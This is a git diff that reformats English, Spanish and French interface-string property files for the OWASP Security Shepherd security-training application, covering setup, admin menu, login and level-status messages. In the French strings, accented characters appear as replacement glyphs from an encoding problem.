-generic.text.setup.upgrade=Update from v3.0
-generic.text.setup.authentication=Authentication token
-generic.text.setup.authentication.help=Please paste the content from the following file into the field
-generic.text.setup.overridedb=Override Databases
-generic.text.setup.authentication.failed=Authentication failure. Please paste the content of the SecurityShepherd.auth file into the authentication field.
-generic.text.setup.connection.failed=Failed to make Connection to Database.
-generic.text.setup.connection.mongo.failed=Failed to make Connection to Mongo DB.
-generic.text.setup.success=Database has been successfully configured.
-generic.text.setup.success.overwrittendb=Database was overwritten and restored to the default Security Shepherd state.
-generic.text.setup.success.updatedb=Database was updated from a previous Security Shepherd install.
-generic.text.setup.failed=Failed setting up the database
-generic.text.setup.file.failed=Failed to create file for unsafe levels
-generic.text.setup.file.success=Created file for unsafe levels
-generic.text.setup.response.success=Database Configuration Complete
-generic.text.setup.response.success.redirecting=Redirecting you to the login page...
-generic.text.setup.response.failed=Database Configuration Failed
-generic.text.setup.error.valid.port=The port you entered is invalid. It must be between 1 and 65535
-getter.button.completed=Completed
-getter.button.nextChallenge=Get Next Challenge
-getter.button.finished=You've Finished!
-getter.button.noModulesFound=No Modules Found
-getter.tournamentRank.1=Field Training
-getter.tournamentRank.2=Private
-getter.tournamentRank.3=Corporal
-getter.tournamentRank.4=Sergeant
-getter.tournamentRank.5=Lieutenant
-getter.tournamentRank.6=Major
-getter.tournamentRank.7=Admiral
-getStarted.text.lets_start=Let's Get Started
-getStarted.button.openLevels.all=Open All Levels
-getStarted.button.openLevels.web=Open Web App Levels Only
-getStarted.button.openLevels.mobile=Open Mobile Levels Only
-getStarted.button.closeLevels=Close All Levels
-getStarted.button.enable.unsafe=Enable Unsafe Levels
-getStarted.enable.unsafe.info=[WARNING] - Your server will become vulnerable with these levels enabled
-blockedMessage.text.heading.levelBlocked=Level Currently Blocked
-index.link.admin.cheatSheet.manage=Cheat Sheet Management
-index.link.admin.cheatSheet.manage.create=Create New Cheat Sheet
-index.link.admin.cheatSheet.manage.disable=Disable Cheat Sheets
-index.link.admin.cheatSheet.manage.enable=Enable Cheat Sheets
-index.link.admin.config.change=Change Module Layout
-index.link.admin.config.feedback=Feedback Configuration
-index.link.admin.config.openClose=Open/Close Registration
-index.link.admin.config.scoreboard=Scoreboard Configuration
-index.link.admin.config.coreDb=Set Core Database
-index.link.admin.moduleManage=Module Management
-index.link.admin.moduleManage.block=Module Block Setup
-index.link.admin.moduleManage.openClose=Open and Close Modules
-index.link.admin.moduleManage.openCloseCategory=Open or Close by Category
-index.link.admin.moduleManage.feedback=View Feedback
-index.link.admin.moduleManage.progress=View Progress
-index.link.admin.userMange=User Management
-index.link.admin.userMange.addPlayer=Add Players
-index.link.admin.userMange.deletePlayer=Delete Players
-index.link.admin.userMange.addPoints=Add / Deduct Player Points
-index.link.admin.userMange.assignPlayer=Assign Players to Class
-index.link.admin.userMange.createClass=Create Class
-index.link.admin.userMange.createAdmin=Create New Admin
-index.link.admin.userMange.resetPass=Reset Password
-index.link.admin.userMange.setDefaultPlayerClass=Set Default Player Class
-index.link.admin.userMange.suspendPlayer=Suspend Player
-index.link.admin.userMange.unsuspendPlayer=Undo Suspend Player
-index.link.admin.userMange.upgradeToAdmin=Upgrade Player to Admin
-index.link.admin.userMange.downgradeToPlayer=Downgrade Admin to Player
-login.text.sponsers=Project Sponsors
-readyToPlay.title.readyToPlay=Security Shepherd - Ready to Go?
-readyToPlay.header.notReady=You're not ready!
-readyToPlay.title.enteredGame=You have entered the game!
-login.text.proxy_question=Do you need a Proxy?
-login.text.download_proxy=Download a HTTP Proxy here
-login.link.zap_win=ZAP for Windows
-login.link.zap_lin=ZAP for Linux
-login.link.zap_mac=ZAP for Mac
-blockedMessage.text.info.levelBlocked=Your doing very well! An administrator has currently marked this level as closed. To find out when this level will be available, your going to have to ask the person who is in charge on the application!
-getStarted.text.moduleInfo.openFloor=Now that you have signed in, lets get started with some Security Shepherd modules! To start a module, click on the list headers, Lessons or Modules, in the side menu to see what modules are currently available!
-getStarted.text.moduleInfo.incrementalFloor=Now that you have signed in, lets get started with some Security Shepherd challenges! To start one, click the "Get Next Challenge" button on the left!
-getStarted.text.moduleInfo=Now that you have signed in, lets get started with some Security Shepherd modules! To start a module, click on the list headers, such as Field Training or Corporal, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth!
-getStarted.text.configureShepherd.asAnAdmin=As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
-getStarted.text.checkShepConfigMsg=If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
-getStarted.text.info.changePassword=Your password is a temporary password. This means that somebody else knows it! Lets keep things secure and change your password now!
-getStarted.text.info.changeUsername=You have the option to change your username here. This username will be shown publicly on the scoreboard.
-login.text.info=Use your Security Shepherd Credentials to Login.
-login.text.regInfo=Register a Security Shepherd Account here!
-login.text.scoreboard=View the scoreboard.
-login.text.about_blurb=The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use.
The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
-login.text.sponsers_blurb=The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
-login.text.thanks=The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
-readyToPlay.text.info.notReady=Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
-readyToPlay.text.info.enteredGame=Now that you can see this, you're good to go! Get cracking on lessons and challenges!
Remember, the levels you are playing are sub applications. Keep the game play in these applications! Stay away from your session ID's! You'll just log yourself out of you change them!
If you havn't already configured a web proxy, you better! It makes things much easier!
-module.generic.owasp.guide.to=OWASP Guide to
+generic.text.aboutSecShep = About Security Shepherd
+generic.text.admin = Admin
+generic.text.cheat = Cheat
+generic.text.challenges = Challenges
+generic.text.assignments = Assignments
+generic.text.commentMessage.1 = You are currently looking at the core server.
+generic.text.commentMessage.2 = Nothing related to the levels in Security Shepherd will be found in here.
+generic.text.commentMessage.3 = You might be looking for the iframe embedded in the page.
+generic.text.commentMessage.4 = Try a tool like Firebug to make this stuff easier.
+generic.text.configuration = Configuration
+generic.text.configureShepherd = Configure Shepherd
+generic.text.confirmPasswd = Confirm Password
+generic.text.confirmEmailAddr = Confirm Email
+generic.text.emailAddr = Email Address
+generic.text.lessons = Lessons
+generic.text.login = Login
+generic.text.logout = Logout
+generic.text.loading = Loading...
+generic.text.ssRegister = OWASP Security Shepherd - Register
+generic.text.password = Password
+generic.text.pleaseWait = Please Wait!
+generic.text.register = Register
+generic.text.scoreboard = Scoreboard
+generic.text.searchModules = Search Modules
+generic.text.shepherdVersion = Security Shepherd Version: 3.0
+generic.text.sorryError = Sorry but there was an error
+generic.text.submitResult = Submit Result Key Here
+generic.text.submit = Submit
+generic.text.username = Username
+generic.text.welcome = Welcome
+generic.text.copy.to.clip = Copy to clipboard
+generic.text.setup.title = No Database Configuration
+generic.text.setup.description = Security Shepherd has not detected a database configuration file. Use this form to configure your database server.
+generic.text.setup.enable.mongodb = Enable NoSQL Challenge
+generic.text.setup.enable.unsafe = Enable Unsafe Challenges
+generic.text.setup.enable.unsafe.warn = [WARNING] Your host will be vulnerable with this enabled
+generic.text.setup.form.title = Set Database Properties
+generic.text.setup.token.title = Configuration Authentication Token
+generic.text.setup.token.description = To use this function you must collect an authentication token from the server's file system. Collect it from this path;
+generic.text.setup.host = Hostname
+generic.text.setup.port = Port
+generic.text.setup.user = DB Username
+generic.text.setup.pwd = DB Password
+generic.text.setup.wipe = Fresh Database
+generic.text.setup.dontwipe = Do not override
+generic.text.setup.upgrade = Update from v3.0
+generic.text.setup.authentication = Authentication token
+generic.text.setup.authentication.help = Please paste the content from the following file into the field
+generic.text.setup.overridedb = Override Databases
+generic.text.setup.authentication.failed = Authentication failure. Please paste the content of the SecurityShepherd.auth file into the authentication field.
+generic.text.setup.connection.failed = Failed to make Connection to Database.
+generic.text.setup.connection.mongo.failed = Failed to make Connection to Mongo DB.
+generic.text.setup.success = Database has been successfully configured.
+generic.text.setup.success.overwrittendb = Database was overwritten and restored to the default Security Shepherd state.
+generic.text.setup.success.updatedb = Database was updated from a previous Security Shepherd install.
+generic.text.setup.failed = Failed setting up the database
+generic.text.setup.file.failed = Failed to create file for unsafe levels
+generic.text.setup.file.success = Created file for unsafe levels
+generic.text.setup.response.success = Database Configuration Complete
+generic.text.setup.response.success.redirecting = Redirecting you to the login page...
+generic.text.setup.response.failed = Database Configuration Failed
+generic.text.setup.error.valid.port = The port you entered is invalid. It must be between 1 and 65535
+
+getter.button.completed = Completed
+getter.button.nextChallenge = Get Next Challenge
+getter.button.finished = You've Finished!
+getter.button.noModulesFound = No Modules Found
+getter.tournamentRank.1 = Field Training
+getter.tournamentRank.2 = Private
+getter.tournamentRank.3 = Corporal
+getter.tournamentRank.4 = Sergeant
+getter.tournamentRank.5 = Lieutenant
+getter.tournamentRank.6 = Major
+getter.tournamentRank.7 = Admiral
+
+getStarted.text.lets_start = Let's Get Started
+getStarted.button.openLevels.all = Open All Levels
+getStarted.button.openLevels.web = Open Web App Levels Only
+getStarted.button.openLevels.mobile = Open Mobile Levels Only
+getStarted.button.closeLevels = Close All Levels
+getStarted.button.enable.unsafe = Enable Unsafe Levels
+getStarted.enable.unsafe.info = [WARNING] - Your server will become vulnerable with these levels enabled
+blockedMessage.text.heading.levelBlocked = Level Currently Blocked
+index.link.admin.cheatSheet.manage = Cheat Sheet Management
+index.link.admin.cheatSheet.manage.create = Create New Cheat Sheet
+index.link.admin.cheatSheet.manage.disable = Disable Cheat Sheets
+index.link.admin.cheatSheet.manage.enable = Enable Cheat Sheets
+index.link.admin.config.change = Change Module Layout
+index.link.admin.config.feedback = Feedback Configuration
+index.link.admin.config.openClose = Open/Close Registration
+index.link.admin.config.scoreboard = Scoreboard Configuration
+index.link.admin.config.coreDb = Set Core Database
+index.link.admin.moduleManage = Module Management
+index.link.admin.moduleManage.block = Module Block Setup
+index.link.admin.moduleManage.openClose = Open and Close Modules
+index.link.admin.moduleManage.openCloseCategory = Open or Close by Category
+index.link.admin.moduleManage.feedback = View Feedback
+index.link.admin.moduleManage.progress = View Progress
+index.link.admin.userMange = User Management
+index.link.admin.userMange.addPlayer = Add Players
+index.link.admin.userMange.deletePlayer = Delete Players
+index.link.admin.userMange.addPoints = Add / Deduct Player Points
+index.link.admin.userMange.assignPlayer = Assign Players to Class
+index.link.admin.userMange.createClass = Create Class
+index.link.admin.userMange.createAdmin = Create New Admin
+index.link.admin.userMange.resetPass = Reset Password
+index.link.admin.userMange.setDefaultPlayerClass = Set Default Player Class
+index.link.admin.userMange.suspendPlayer = Suspend Player
+index.link.admin.userMange.unsuspendPlayer = Undo Suspend Player
+index.link.admin.userMange.upgradeToAdmin = Upgrade Player to Admin
+index.link.admin.userMange.downgradeToPlayer = Downgrade Admin to Player
+login.text.sponsers = Project Sponsors
+readyToPlay.title.readyToPlay = Security Shepherd - Ready to Go?
+readyToPlay.header.notReady = You're not ready!
+readyToPlay.title.enteredGame = You have entered the game!
+login.text.proxy_question = Do you need a Proxy?
+login.text.download_proxy = Download a HTTP Proxy here
+
+
+login.link.zap_win = ZAP for Windows
+login.link.zap_lin = ZAP for Linux
+login.link.zap_mac = ZAP for Mac
+
+
+blockedMessage.text.info.levelBlocked = Your doing very well! An administrator has currently marked this level as closed. To find out when this level will be available, your going to have to ask the person who is in charge on the application!
+getStarted.text.moduleInfo.openFloor = Now that you have signed in, lets get started with some Security Shepherd modules! To start a module, click on the list headers, Lessons or Modules, in the side menu to see what modules are currently available!
+getStarted.text.moduleInfo.incrementalFloor = Now that you have signed in, lets get started with some Security Shepherd challenges! To start one, click the "Get Next Challenge" button on the left!
+getStarted.text.moduleInfo = Now that you have signed in, lets get started with some Security Shepherd modules! To start a module, click on the list headers, such as Field Training or Corporal, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth!
+getStarted.text.configureShepherd.asAnAdmin = As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
+getStarted.text.checkShepConfigMsg = If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
+getStarted.text.info.changePassword = Your password is a temporary password. This means that somebody else knows it! Lets keep things secure and change your password now!
+getStarted.text.info.changeUsername = You have the option to change your username here. This username will be shown publicly on the scoreboard.
+login.text.info = Use your Security Shepherd Credentials to Login.
+login.text.regInfo = Register a Security Shepherd Account here!
+login.text.scoreboard = View the scoreboard.
+login.text.about_blurb = The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use.
The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
+login.text.sponsers_blurb = The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
+login.text.thanks = The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
+readyToPlay.text.info.notReady = Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
+readyToPlay.text.info.enteredGame = Now that you can see this, you're good to go! Get cracking on lessons and challenges!
Remember, the levels you are playing are sub applications. Keep the game play in these applications! Stay away from your session ID's! You'll just log yourself out of you change them!
If you havn't already configured a web proxy, you better! It makes things much easier!
+
+module.generic.owasp.guide.to = OWASP Guide to
module.generic.owasp.more.info=For more information please visit
-sponsorship.title=Project Sponsors
-sponsorship.message.1=The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Security Shepherd would not exist as it does today without them. Please check out their web pages and follow them on twitter.
+
+sponsorship.title = Project Sponsors
+sponsorship.message.1 = The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Security Shepherd would not exist as it does today without them. Please check out their web pages and follow them on twitter.
diff --git a/src/main/resources/i18n/text_es.properties b/src/main/resources/i18n/text_es.properties
index eed14778b..3d1aad04b 100644
--- a/src/main/resources/i18n/text_es.properties
+++ b/src/main/resources/i18n/text_es.properties
@@ -1,41 +1,45 @@
-generic.text.aboutSecShep=Sobre Security Shepherd
-generic.text.admin=Administración
-generic.text.cheat=Hacer trampas
-generic.text.challenges=Desafíos
-generic.text.commentMessage.1=Estás mirando en el servidor central.
-generic.text.commentMessage.2=Aquí no hay nada relacionado con los niveles de Security Sheperd.
-generic.text.commentMessage.3=Puede que estés buscando el iframe incorporado (embedded iframe) en la página.
-generic.text.commentMessage.4=Prueba una herramienta como Firebug para hacer esto más fácil.
-generic.text.configuration=Configuración
-generic.text.configureShepherd=Configure Shepherd
-generic.text.confirmPasswd=Confirmar Contraseña
-generic.text.confirmEmailAddr=Confirmar Correo Electrónico
-generic.text.emailAddr=Dirección de correo electrónico
-generic.text.lessons=Lecciones
-generic.text.login=Acceder
-generic.text.logout=Cerrar Sesión
-generic.text.loading=Cargando...Engañar
-generic.text.ssRegister=OWASP Security Shepherd - Registro
-generic.text.password=Contraseña
-generic.text.pleaseWait=Por favor, espera!
-generic.text.register=Registro
-generic.text.scoreboard=Marcador
-generic.text.searchModules=Buscar módulos
-generic.text.shepherdVersion=Security Shepherd Version: 3.0
-generic.text.sorryError=Sorry but there was an error
-generic.text.submitResult=Submit Result Key Here
-generic.text.username=Nombre de usario
-generic.text.welcome=Bienvenida
-getter.button.nextChallenge=Conseguir el próximo Desafío
-login.text.info=Utilice su Credenciales de Security Shepherd a inicio.
-login.text.regInfo=Registrar la Cuenta Security Shepherd span> aquí!
-login.text.proxy_question=¿Necesita un proxy?
-login.text.about_blurb=El proyecto OWASP Security Shepherd se ha diseñado e implementado con el objetivo de fomentar y mejorar el conocimiento de seguridad de aplicaciones entre un variado conjunto de habilidades demográfica. Este proyecto permite a los usuarios aprender o mejorar en las habilidades de pruebas de penetración manuales existentes. Esto se logra a través de técnicas de lecciones y de desafío. Una lección proporciona al usuario una gran cantidad de ayuda en la realización de ese módulo, donde un desafío pone lo que el usuario aprendido en la lección de usar. P>
La OWASP Security Shepherd proyecto abarca los diez primeros OWASP riesgos de aplicaciones web y también cubre los diez riesgos móviles OWASP también. El uso de estos riesgos como un banco de pruebas desafío, las vulnerabilidades de seguridad comunes pueden ser explorados y su impacto en un sistema entendidos. Muchos de estos niveles incluyen mitigaciones insuficientes y protecciones a estos riesgos, como los filtros de la lista negra, esquemas de codificación atroces, los mecanismos de seguridad de barbarie y de la configuración de seguridad pobres. Los módulos han sido concebidos para ofrecer no sólo un reto para un novato de seguridad, pero los profesionales de seguridad también.
-login.text.download_proxy=Descarga un Proxy HTTP aquí
-login.link.zap_win=ZAP para Windows
-login.link.zap_lin=ZAP para Linux
-login.link.zap_mac=ZAP para Mac
-login.text.sponsers=Los patrocinadores del proyecto
-login.text.sponsers_blurb=TEl proyecto OWASP Security Shepherd desea reconocer y agradecer el generoso apoyo de nuestros patrocinadores. Por favor revise sus páginas web y seguirlos en Twitter.
-login.text.thanks=La OWASP Security Shepherd Proyecto también quisiera agradecer al Dr. Anthony Keane y el laboratorio de investigación de la ITB de Seguridad para acoger al público https://owasp.securityShepherd.eu
-getStarted.text.lets_start=Empecemos
\ No newline at end of file
+generic.text.aboutSecShep = Sobre Security Shepherd
+generic.text.admin = Administración
+generic.text.cheat = Hacer trampas
+generic.text.challenges = Desafíos
+generic.text.commentMessage.1 = Estás mirando en el servidor central.
+generic.text.commentMessage.2 = Aquí no hay nada relacionado con los niveles de Security Sheperd.
+generic.text.commentMessage.3 = Puede que estés buscando el iframe incorporado (embedded iframe) en la página.
+generic.text.commentMessage.4 = Prueba una herramienta como Firebug para hacer esto más fácil.
+generic.text.configuration = Configuración
+generic.text.configureShepherd = Configure Shepherd
+generic.text.confirmPasswd = Confirmar Contraseña
+generic.text.confirmEmailAddr = Confirmar Correo Electrónico
+generic.text.emailAddr = Dirección de correo electrónico
+generic.text.lessons = Lecciones
+generic.text.login = Acceder
+generic.text.logout = Cerrar Sesión
+generic.text.loading = Cargando...Engañar
+generic.text.ssRegister = OWASP Security Shepherd - Registro
+generic.text.password = Contraseña
+generic.text.pleaseWait = Por favor, espera!
+generic.text.register = Registro
+generic.text.scoreboard = Marcador
+generic.text.searchModules = Buscar módulos
+generic.text.shepherdVersion = Security Shepherd Version: 3.0
+generic.text.sorryError = Sorry but there was an error
+generic.text.submitResult = Submit Result Key Here
+generic.text.username = Nombre de usario
+generic.text.welcome = Bienvenida
+
+getter.button.nextChallenge = Conseguir el próximo Desafío
+
+
+
+login.text.info = Utilice su Credenciales de Security Shepherd a inicio.
+login.text.regInfo = Registrar la Cuenta Security Shepherd span> aquí!
+login.text.proxy_question = ¿Necesita un proxy?
+login.text.about_blurb = El proyecto OWASP Security Shepherd se ha diseñado e implementado con el objetivo de fomentar y mejorar el conocimiento de seguridad de aplicaciones entre un variado conjunto de habilidades demográfica. Este proyecto permite a los usuarios aprender o mejorar en las habilidades de pruebas de penetración manuales existentes. Esto se logra a través de técnicas de lecciones y de desafío. Una lección proporciona al usuario una gran cantidad de ayuda en la realización de ese módulo, donde un desafío pone lo que el usuario aprendido en la lección de usar. P>
La OWASP Security Shepherd proyecto abarca los diez primeros OWASP riesgos de aplicaciones web y también cubre los diez riesgos móviles OWASP también. El uso de estos riesgos como un banco de pruebas desafío, las vulnerabilidades de seguridad comunes pueden ser explorados y su impacto en un sistema entendidos. Muchos de estos niveles incluyen mitigaciones insuficientes y protecciones a estos riesgos, como los filtros de la lista negra, esquemas de codificación atroces, los mecanismos de seguridad de barbarie y de la configuración de seguridad pobres. Los módulos han sido concebidos para ofrecer no sólo un reto para un novato de seguridad, pero los profesionales de seguridad también.
+login.text.download_proxy = Descarga un Proxy HTTP aquí
+login.link.zap_win = ZAP para Windows
+login.link.zap_lin = ZAP para Linux
+login.link.zap_mac = ZAP para Mac
+login.text.sponsers = Los patrocinadores del proyecto
+login.text.sponsers_blurb = TEl proyecto OWASP Security Shepherd desea reconocer y agradecer el generoso apoyo de nuestros patrocinadores. Por favor revise sus páginas web y seguirlos en Twitter.
+login.text.thanks = La OWASP Security Shepherd Proyecto también quisiera agradecer al Dr. Anthony Keane y el laboratorio de investigación de la ITB de Seguridad para acoger al público https://owasp.securityShepherd.eu
+getStarted.text.lets_start = Empecemos
\ No newline at end of file
diff --git a/src/main/resources/i18n/text_fr.properties b/src/main/resources/i18n/text_fr.properties
index d95651c31..19b11df02 100644
--- a/src/main/resources/i18n/text_fr.properties
+++ b/src/main/resources/i18n/text_fr.properties
@@ -1,77 +1,84 @@
-generic.text.aboutSecShep=A Propos de Security Shepherd
-generic.text.admin=Admin
-generic.text.cheat=Cheat
-generic.text.challenges=Challenges
-generic.text.configuration=Configuration
-generic.text.configureShepherd=Configurer Shepherd
-generic.text.confirmPasswd=Confirmer le Mot de Passe
-generic.text.confirmEmailAddr=Confirmer l'Email
-generic.text.emailAddr=Adresse Email
-generic.text.lessons=Le�ons
-generic.text.login=Connexion
-generic.text.logout=D�connexion
-generic.text.loading=Chargement...
-generic.text.ssRegister=OWASP Security Shepherd - Register
-generic.text.password=Mot de Passe
-generic.text.pleaseWait=Veuillez Attendre !
-generic.text.register=Enregistrer
-generic.text.scoreboard=Tableau de Bord
-generic.text.submit=Soumettre
-generic.text.username=Nom d'Utilisateur
-generic.text.welcome=Bienvenue
-getter.button.nextChallenge=Challenge Suivant
-getStarted.text.lets_start=Commen�ons
-getStarted.button.openLevels.all=Ouvrir Tous les Niveaux
-getStarted.button.openLevels.web=Ouvrrir les Niveaux WebApp Uniquement
-getStarted.button.openLevels.mobile=Ouvrir les Niveaux Mobile Uniquement
-getStarted.button.closeLevels=Fermer Tous les Niveaux
-blockedMessage.text.heading.levelBlocked=Niveau Actuellement Bloqu�
-index.link.admin.cheatSheet.manage=G�rer les Cheat Sheets
-index.link.admin.cheatSheet.manage.create=Cr�er une Nouvelle Cheat Sheet
-index.link.admin.cheatSheet.manage.disable=D�sactiver les Cheat Sheets
-index.link.admin.cheatSheet.manage.enable=Activer les Cheat Sheets
-index.link.admin.config.change=Changer la Disposition du Module
-index.link.admin.config.feedback=Configuration des Feedbacks
-index.link.admin.config.openClose=Ouvrir/Fermer les Inscriptions
-index.link.admin.config.scoreboard=Configuration du Tableau du Bord
-index.link.admin.config.coreDb=Installer la Base de Donn�es Centrale
-index.link.admin.moduleManage=Gestion des Modules
-index.link.admin.moduleManage.block=Pr�f�rences de Blocage des Modules
-index.link.admin.moduleManage.openClose=Ouvrir et Fermer des Modules
-index.link.admin.moduleManage.openCloseCategory=Ouvrir et Fermer par Cat�gorie
-index.link.admin.moduleManage.feedback=Voir les Feedbacks
-index.link.admin.moduleManage.progress=Voir les Progr�s
-index.link.admin.userMange=Gestion des Utilisateurs
-index.link.admin.userMange.addPlayer=Ajouter des Joueurs
-index.link.admin.userMange.addPoints=Ajouter/D�duire des Points aux Joueurs
-index.link.admin.userMange.assignPlayer=Assigner des Joueurs � une Classe
-index.link.admin.userMange.createClass=Cr�er une Classe
-index.link.admin.userMange.createAdmin=Cr�er un Nouvel Admin
-index.link.admin.userMange.resetPass=R�initialiser le mot de passe
-index.link.admin.userMange.setDefaultPlayerClass=Configurer une Classe par D�faut
-index.link.admin.userMange.suspendPlayer=Suspendre le Joueur
-index.link.admin.userMange.unsuspendPlayer=Annuler la Suspension du Joueur
-index.link.admin.userMange.upgradeToAdmin=Promouvoir le Joueur en Admin
-login.text.sponsers=Sponsors du Projet
-readyToPlay.title.readyToPlay=Security Shepherd - Pr�t ?
-readyToPlay.header.notReady=Vous n'�tes pas pr�t !
-readyToPlay.title.enteredGame=Vous �tes entr� dans le jeu !
-login.text.proxy_question=Avez-vous besoin d'un proxy ?
-login.text.download_proxy=T�l�charger un proxy HTTP
-login.link.zap_win=ZAP pour Windows
-login.link.zap_lin=ZAP pour Linux
-login.link.zap_mac=ZAP pour Mac
-blockedMessage.text.info.levelBlocked=Un administrateur a ferm� ce niveau. Pour savoir quand il sera disponible, veuillez vous adressez � la personne en charge de l'application.
-getStarted.text.moduleInfo.openFloor=Maintenant que vous �tes connect�s, commen�ons avec quelques modules ! Pour en commencez un, cliquez sur un ent�te, tel que Lessons ou Modules, dans le menu lat�ral pour voir quels modules sont actuellement disponibles !
-getStarted.text.moduleInfo.incrementalFloor=Maintenant que vous �tes connect�s, commen�ons avec quelques challenges ! Pour en commencer un, cliquez sur le bouton "Challenge Suivant" sur la gauche !
-getStarted.text.moduleInfo=Maintenant que vous �tes connect�s, commen�ons avec quelques modules ! Pour en commencer un, cliquez sur un ent�te, tel que Field Training ou Corporal, dans le menu lat�ral pour voir quels modules sont actuellement disponibles ! Plus le module est bas dans le menu, plus il vaut de points !
-getStarted.text.configureShepherd.asAnAdmin=En tant qu'administrateur, vous pouvez d�finir la port�e de Security Shepherd. Vous pouvez facilement changer la disposition du jeu en Web ou Mobile Application avec les boutons suivants. Vous pouvez aussi ouvrir le panel administrateur, dans le coin en haut � gauche de la page, pour ouvrir ou fermer des sujets sp�cifiques.
-getStarted.text.checkShepConfigMsg=Si vous ne pouvez pas voir le message sous ce paragraphe, merci de vous assurer que l'instance Security Shepherd est correctement configur�e.
-getStarted.text.info.changePassword=Votre mot de passe est temporaire. Cela signifie que quelqu'un d'autre le connait ! Changez le maintenant pour plus de s�curit� !
-login.text.info=Utilisez vos informations d'identification Security Shepherd pour vous connecter.
-login.text.regInfo=Enregistrer un compte Security Shepherd ici !
-login.text.about_blurb=OWASP Security Shepherd Project a �t� con�u et d�velopp� avec pour objectif de favoriser et am�liorer la sensibilit� � la s�curit� des applications sur un ensemble vari� de comp�tences. Ce projet permet aux utilisateurs d'apprendre et d'am�liorer leur aptitudes en tests d'intrusion. Cela est r�aliser au travers de le�ons et challenges techniques. Les le�ons aident les utilisateurs � finir un module tandis que les challenges permettent de mettre en pratique les acquis.
OWASP Security Shepherd Project couvre les Top 10 WebApp Risks et Modile Risks de l'OWASP. En utilisant ces risques comme base d'apprentissage, les failles de s�curit� les plus communes peuvent �tre explor�es et leur impact mieux compris. Beaucoup de ces niveaux inclus des protections insuffisantes et des corrections partielles, telles que des filtrages par blacklist, des mauvaises configurations et des m�thodes de codage atroces. Ces challenges ont �t� con�u pour les professionnels autant que pour les �tudiants.
-login.text.sponsers_blurb=OWASP Security Shepherd Project reconna�t aussi avec gratitude le soutien apport� par nos sponsors. Nous vous encourageons � visiter leur site web et � les suivre sur Twitter.
-login.text.thanks=OWASP Security Shepherd Project tient � remercier Dr. Anthony Keane et ITB Security Research Lab pour leur h�bergement de https://owasp.securityShepherd.eu
-readyToPlay.text.info.notReady=Rafra�chissez la page d'accueil ! Si cette erreur persiste, essayez de vous reconnecter. Si cela ne r�soud pas le probl�me, contactez un administrateur !
-readyToPlay.text.info.enteredGame=Maintenant que vous pouvez voir ce message vous �tes pr�t ! Commencez � lire les le�ons et � r�soudre les challenges !
Souvenez-vous, les niveaux sont des sous-applications. Gardez le jeu dans ces applications ! Les ID de session n'en font pas partie ! Vous ne feriez que vous d�connecter vous-m�mes !
Si vous n'avez pas encore configur� un proxy web, vous devriez. Cela vous sera particuli�rement utile !
+generic.text.aboutSecShep = A Propos de Security Shepherd
+generic.text.admin = Admin
+generic.text.cheat = Cheat
+generic.text.challenges = Challenges
+generic.text.configuration = Configuration
+generic.text.configureShepherd = Configurer Shepherd
+generic.text.confirmPasswd = Confirmer le Mot de Passe
+generic.text.confirmEmailAddr = Confirmer l'Email
+generic.text.emailAddr = Adresse Email
+generic.text.lessons = Le�ons
+generic.text.login = Connexion
+generic.text.logout = D�connexion
+generic.text.loading = Chargement...
+generic.text.ssRegister = OWASP Security Shepherd - Register
+generic.text.password = Mot de Passe
+generic.text.pleaseWait = Veuillez Attendre !
+generic.text.register = Enregistrer
+generic.text.scoreboard = Tableau de Bord
+generic.text.submit = Soumettre
+generic.text.username = Nom d'Utilisateur
+generic.text.welcome = Bienvenue
+
+getter.button.nextChallenge = Challenge Suivant
+
+
+getStarted.text.lets_start = Commen�ons
+getStarted.button.openLevels.all = Ouvrir Tous les Niveaux
+getStarted.button.openLevels.web = Ouvrrir les Niveaux WebApp Uniquement
+getStarted.button.openLevels.mobile = Ouvrir les Niveaux Mobile Uniquement
+getStarted.button.closeLevels = Fermer Tous les Niveaux
+blockedMessage.text.heading.levelBlocked = Niveau Actuellement Bloqu�
+index.link.admin.cheatSheet.manage = G�rer les Cheat Sheets
+index.link.admin.cheatSheet.manage.create = Cr�er une Nouvelle Cheat Sheet
+index.link.admin.cheatSheet.manage.disable = D�sactiver les Cheat Sheets
+index.link.admin.cheatSheet.manage.enable = Activer les Cheat Sheets
